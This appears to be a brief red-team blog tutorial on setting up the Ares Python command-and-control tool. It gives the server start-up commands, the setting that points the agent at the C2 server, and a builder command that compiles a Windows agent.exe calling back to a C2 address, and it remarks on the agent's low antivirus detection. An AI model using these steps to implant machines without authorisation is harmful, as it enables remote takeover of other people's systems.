The high demand for Red Team assessments has increased the interest of security companies and consultants in developing command and control tools with different capabilities. Some of these tools can be used in official engagements, while others have been developed only for research purposes.
Ares is a command and control tool written in Python and developed by Kevin Locati. It has a web interface which runs on port 8080 and is protected by a password and a passphrase. The database must be created before running the server.
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Once the password is set, Ares will ask for a passphrase to be used.
The main interface of Ares contains only three functions:
- Agent List
- Change Password
- Disconnect
The Agent List is the page where all the infected hosts running the implant will appear.
The config.py file in the agent folder controls the settings of the agent. Before anything else, the SERVER variable must be changed to the IP address on which the command and control server is running.
If wine is installed (the Ares repository contains a wine setup script), the agent can be built as an executable by running the following command:
./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Hosts that are running the agent will appear on the agent list in the following format.
Commands can be executed on the target hosts from a field and the output will be retrieved in a console window.
Apart from basic command execution on the target host, Ares doesn't offer other capabilities. However, at the time being the agent has a low detection rate against a number of antivirus products.